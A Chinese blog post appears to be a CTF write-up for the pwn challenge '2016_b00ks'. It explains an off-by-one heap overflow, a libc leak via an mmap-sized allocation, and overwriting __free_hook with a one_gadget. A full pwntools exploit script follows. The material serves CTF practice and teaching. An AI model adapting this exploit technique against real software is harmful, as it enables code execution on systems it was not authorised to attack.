2016_b00ks

ReTCyc1e

已于 2022-11-01 15:39:42 修改

阅读量113

点赞数 1

分类专栏： # CTF 文章标签： pwn

于 2022-11-01 15:31:58 首次发布

本文链接：https://blog.csdn.net/m0_52772399/article/details/127634069

版权

CTF 专栏收录该内容

6 篇文章 1 订阅

订阅专栏

2016_b00ks

off-by-one漏洞原理

边界的检查不够严谨，或者写入的size正好就只多了一个字节
在这里插入图片描述
这题呢，函数这里循环了33次，导致了一个字节的溢出

查看数据，off_202010保存的是off_202060的地址，off_202060是保存book的地址，off_202018保存的是 author name ，要清楚这几者之间的关系。
在这里插入图片描述

第一步

写入作者名字，申请book堆块，第一个堆块是书名，第二个堆块是书内容

sla("name: ",b"a"*0x20)
add(0xd0,b"a"*8,0x20,b"a"*8)
add(0x21000,b"a"*8,0x21000,b"a"*8)

解释一下，这里有两个问题

book1 为什么选择书名 size 是 0xd0（我的是0xd0，每个人可能不一样，根据实际情况修改）
book2 为什么 size 都是 0x21000

当触发off-by-one，book1 的地址 0x000055ab43397130 —> 0x000055ab43397100，正好是书内容地址，所以可以构造fake chunk
在这里插入图片描述

申请0x21000的主要目的就是为了泄露libc基地址，只有申请接近或超过top_chunk的size大小的空间，使得堆以mmap的形式进行扩展，那么mmap申请的这个空间会以单独的段形式表示。
在这里插入图片描述

第二步

作者名和book1地址连接在一起，打印书籍就可以泄露book1的地址

show()
ru(b"a"*0x20)
book1_addr = uu64()

在这里插入图片描述

第三步

在书内容块构造fake chunk，写入 book2 的书名地址和内容地址，并且触发off-by-one，修改 book1 的地址

payload = p64(0x1) + p64(book1_addr+0x38) + p64(book1_addr+0x40) + p64(0xffff)
edit(1,payload)
change(b"a"*0x20)

在这里插入图片描述

第四步

泄露book结构体的地址

show()
ru("Name: ")
leak_addr = uu64()
libc_base = leak_addr - 0x5af010

在这里插入图片描述

leak_addr - libc_base = 0x00007fe0b632d010 - 0x7fe0b5d7e000 = 0x5af010

第五步

把 book1 的内容地址(也就是book2的内容地址)修改为 free_hook，free_hook 修改为 one_gadget

free_hook = libc.sym["__free_hook"]+libc_base
lg("free_hook")
one_gadget = libc_base + 0x4527a

edit(1,p64(free_hook))
edit(2,p64(one_gadget))

在这里插入图片描述
本地是可以打通的，远程它就卡在delete(2)

from pwn import *

binary = "./b00ks"
elf = ELF(binary)
libc = elf.libc
ip = 'node4.buuoj.cn'
port = 25610
local = 1
if local:
	io = process(binary)
else:
	io = remote(ip, port)

#context.log_level = "debug"

def debug():
	gdb.attach(io)
	pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
p = lambda : print(io.recv())
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recv(6).ljust(8, b"\x00"))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()
_flags = 0xfbad1800

def menu(n):
	sla(b'> ', str(n))

def add(nsize,name,dsize,desc):
	menu(1)
	sla("name size: ",str(nsize))
	sla("name (Max 32 chars): ",name)
	sla("description size: ",str(dsize))
	sla("description: ",desc)	

def delete(idx):
	menu(2)
	sla("delete: ",str(idx))	

def edit(idx,con):
	menu(3)
	sla("edit: ",str(idx))
	sla("description: ",con)	

def show():
	menu(4)
	
def change(name):
	menu(5)
	sla("name: ",name)

sla("name: ",b"a"*0x20)
add(0xd0,b"a"*8,0x20,b"a"*8)
add(0x21000,b"a"*8,0x21000,b"a"*8)
#debug()


show()
ru(b"a"*0x20)
book1_addr = uu64()
book2_addr = book1_addr + 0x30
lg("book1_addr")
lg("book2_addr")
#debug()

payload = p64(0x1) + p64(book1_addr+0x38) + p64(book1_addr+0x40) + p64(0xffff)
edit(1,payload)
change(b"a"*0x20)
#debug()

show()
ru("Name: ")
leak_addr = uu64()
libc_base = leak_addr - 0x5af010
lg("leak_addr")
lg("libc_base")
#debug()

free_hook = libc.sym["__free_hook"]+libc_base
lg("free_hook")
gadget=[0x45226,0x4527a,0xf03a4,0xf1247]
one_gadget = libc_base + gadget[1]

edit(1,p64(free_hook))
edit(2,p64(one_gadget))
#debug()

delete(2)
ia()